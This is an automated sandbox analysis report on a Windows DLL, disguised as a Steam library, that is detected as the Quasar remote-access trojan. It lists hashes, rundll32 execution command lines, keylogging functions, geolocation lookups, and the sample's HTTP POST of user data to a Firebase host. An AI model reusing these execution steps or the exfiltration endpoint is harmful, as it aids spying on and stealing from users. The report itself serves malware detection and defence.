Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
vstdlib_s64.dll.dll

Overview

General Information

Sample name:vstdlib_s64.dll.dll
(renamed file extension from exe to dll)
Original sample name:vstdlib_s64.dll.exe
Analysis ID:1473780
MD5:ac7da10e20d625cc463536172d0ac33e
SHA1:c4242194e3faa82506513e2572c160a30082bfb0
SHA256:6799f1948048b91991392b421ccc6b30be415cda26deb71baeecb33b41b12959
Tags:BlotchyQuasarexeRAT
Infos:

Detection

Quasar
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Quasar RAT
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 6852 cmdline: loaddll64.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 6876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2696 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 6992 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 796 cmdline: rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixDoubleSlashes MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6200 cmdline: rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixSlashes MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 5236 cmdline: rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_IsAbsolutePath MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7112 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixDoubleSlashes MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7120 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixSlashes MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 2496 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_IsAbsolutePath MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 4136 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_vsnwprintf MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 1052 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncpy MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 1184 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat_length MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7072 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6616 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_snprintf MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7096 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF8ToUTF16 MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7100 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF16ToUTF8 MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6972 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripTrailingSlash MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6252 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripLastDir MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7152 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_RemoveDotSlashes MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Quasar RAT, QuasarRATQuasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
vstdlib_s64.dll.dllJoeSecurity_QuasarYara detected Quasar RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000002.1711858916.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
      0000000B.00000002.1803940812.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
        00000003.00000002.1682910878.000002A89AAA2000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
          00000011.00000002.1803619460.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
            00000003.00000002.1684076753.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
              Click to see the 36 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              13.2.rundll32.exe.7ffdfb3a0000.1.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
                16.2.rundll32.exe.7ffdfb3a0000.1.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
                  18.2.rundll32.exe.1fbe5a90000.0.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
                    6.2.rundll32.exe.1c4bec00000.0.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
                      7.2.rundll32.exe.2755e650000.0.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
                        Click to see the 29 entries

                        Sigma Signatures

                        No Sigma rule has matched

                        Snort Signatures

                        Timestamp:07/15/24-21:07:19.513418
                        SID:2814031
                        Source Port:49738
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:07/15/24-21:07:19.945864
                        SID:2814030
                        Source Port:49739
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Multi AV Scanner detection for submitted file
                        Source: vstdlib_s64.dll.dllReversingLabs: Detection: 26%
                        Yara detected Quasar RAT
                        Source: Yara matchFile source: vstdlib_s64.dll.dll, type: SAMPLE
                        Source: Yara matchFile source: 13.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.rundll32.exe.1fbe5a90000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.rundll32.exe.1c4bec00000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.rundll32.exe.2755e650000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.rundll32.exe.2caf50d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.rundll32.exe.24c76550000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.rundll32.exe.7ffdfb180000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.rundll32.exe.7ffdfb180000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.rundll32.exe.19d796c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.rundll32.exe.1e0a1960000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.rundll32.exe.2596ef30000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.rundll32.exe.1d54ab70000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.rundll32.exe.23d3f970000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rundll32.exe.1dd420a0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.rundll32.exe.2d2ec850000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.rundll32.exe.13f23770000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.7ffdfb180000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.2.rundll32.exe.24f7dfe0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.rundll32.exe.20471360000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.rundll32.exe.1edf6db0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.2a89aaa0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000002.1711858916.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1803940812.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1682910878.000002A89AAA2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1803619460.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1684076753.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1796633648.000001D54AB72000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.1801854722.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1798585277.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1684166716.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1795873767.0000019D796C2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1803576304.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1806601416.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1800566707.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1803017561.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.1805439876.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1683326542.000002596EF32000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.2929241294.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1742655748.000001C4BEC02000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.1798302966.0000023D3F972000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.1805465891.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.1800394851.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1782774058.000001DD420A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1743520661.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000002.1802596768.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1795862473.000002CAF50D2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1795742842.0000013F23772000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1799338023.000001EDF6DB2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000002.1794900321.0000024F7DFE2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.1798309140.000002D2EC852000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.2926634464.0000020471362000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.1711125446.0000024C76552000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.1794101772.000001E0A1962000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.1787872788.000001FBE5A92000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1789628850.000002755E652000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 796, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6992, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6200, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7112, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7120, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2496, type: MEMORYSTR
                        Machine Learning detection for sample
                        Source: vstdlib_s64.dll.dllJoe Sandbox ML: detected
                        Source: unknownHTTPS traffic detected: 35.201.97.85:443 -> 192.168.2.4:49735 version: TLS 1.0
                        Source: vstdlib_s64.dll.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Networking

                        barindex
                        Snort IDS alert for network traffic
                        Source: TrafficSnort IDS: 2814031 ETPRO TROJAN W32/Quasar RAT Connectivity Check 192.168.2.4:49738 -> 88.198.193.213:80
                        Source: TrafficSnort IDS: 2814030 ETPRO TROJAN W32/Quasar RAT Connectivity Check 2 192.168.2.4:49739 -> 3.33.130.190:80
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\System32\rundll32.exeNetwork Connect: 88.198.193.213 80Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeNetwork Connect: 35.201.97.85 443Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeNetwork Connect: 104.26.13.205 80Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeNetwork Connect: 3.33.130.190 80Jump to behavior
                        Source: global trafficHTTP traffic detected: POST /user.json HTTP/1.1Content-Type: application/json; charset=utf-8Host: argentina-e4162-default-rtdb.firebaseio.comContent-Length: 76Expect: 100-continueConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 88.198.193.213 88.198.193.213
                        Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                        Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                        Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
                        Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                        Source: Joe Sandbox ViewASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
                        Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                        Source: unknownDNS query: name: freegeoip.net
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: api.ipify.org
                        Source: global trafficHTTP traffic detected: GET /geoip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0Host: telize.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0Host: freegeoip.netConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: unknownHTTPS traffic detected: 35.201.97.85:443 -> 192.168.2.4:49735 version: TLS 1.0
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /geoip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0Host: telize.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0Host: freegeoip.netConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: argentina-e4162-default-rtdb.firebaseio.com
                        Source: global trafficDNS traffic detected: DNS query: telize.com
                        Source: global trafficDNS traffic detected: DNS query: freegeoip.net
                        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                        Source: unknownHTTP traffic detected: POST /user.json HTTP/1.1Content-Type: application/json; charset=utf-8Host: argentina-e4162-default-rtdb.firebaseio.comContent-Length: 76Expect: 100-continueConnection: Keep-Alive
                        Source: rundll32.exe, rundll32.exe, 00000006.00000002.1742655748.000001C4BEC02000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.1743520661.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1800566707.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1789628850.000002755E652000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000008.00000002.1798585277.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000008.00000002.1782774058.000001DD420A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000009.00000002.1803017561.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://api.ipify.org/
                        Source: rundll32.exe, rundll32.exe, 00000006.00000002.1742655748.000001C4BEC02000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.1743520661.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1800566707.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1789628850.000002755E652000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000008.00000002.1798585277.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000008.00000002.1782774058.000001DD420A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000009.00000002.1803017561.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://freegeoip.net/xml/
                        Source: rundll32.exe, rundll32.exe, 00000006.00000002.1742655748.000001C4BEC02000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.1743520661.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1800566707.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1789628850.000002755E652000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000008.00000002.1798585277.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000008.00000002.1782774058.000001DD420A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000009.00000002.1803017561.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://telize.com/geoip
                        Source: rundll32.exe, rundll32.exe, 00000006.00000002.1742655748.000001C4BEC02000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.1743520661.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1800566707.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1789628850.000002755E652000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000008.00000002.1798585277.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000008.00000002.1782774058.000001DD420A2000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000009.00000002.1803017561.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://argentina-e4162-default-rtdb.firebaseio.com/user.json
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Contains functionality to log keystrokes (.Net Source)
                        Source: vstdlib_s64.dll.dll, oqBXyy.cs.Net Code: Instal_Key_Capt
                        Source: vstdlib_s64.dll.dll, pblsOey.cs.Net Code: hook

                        E-Banking Fraud

                        barindex
                        Yara detected Quasar RAT
                        Source: Yara matchFile source: vstdlib_s64.dll.dll, type: SAMPLE
                        Source: Yara matchFile source: 13.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.rundll32.exe.1fbe5a90000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.rundll32.exe.1c4bec00000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.rundll32.exe.2755e650000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.rundll32.exe.2caf50d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.rundll32.exe.24c76550000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.rundll32.exe.7ffdfb180000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.rundll32.exe.7ffdfb180000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.rundll32.exe.19d796c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.rundll32.exe.1e0a1960000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.rundll32.exe.2596ef30000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.rundll32.exe.1d54ab70000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.rundll32.exe.23d3f970000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rundll32.exe.1dd420a0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.rundll32.exe.2d2ec850000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.rundll32.exe.13f23770000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.7ffdfb180000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.2.rundll32.exe.24f7dfe0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.rundll32.exe.20471360000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.rundll32.exe.1edf6db0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.2a89aaa0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000002.1711858916.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1803940812.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1682910878.000002A89AAA2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1803619460.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1684076753.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1796633648.000001D54AB72000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.1801854722.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1798585277.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1684166716.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1795873767.0000019D796C2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
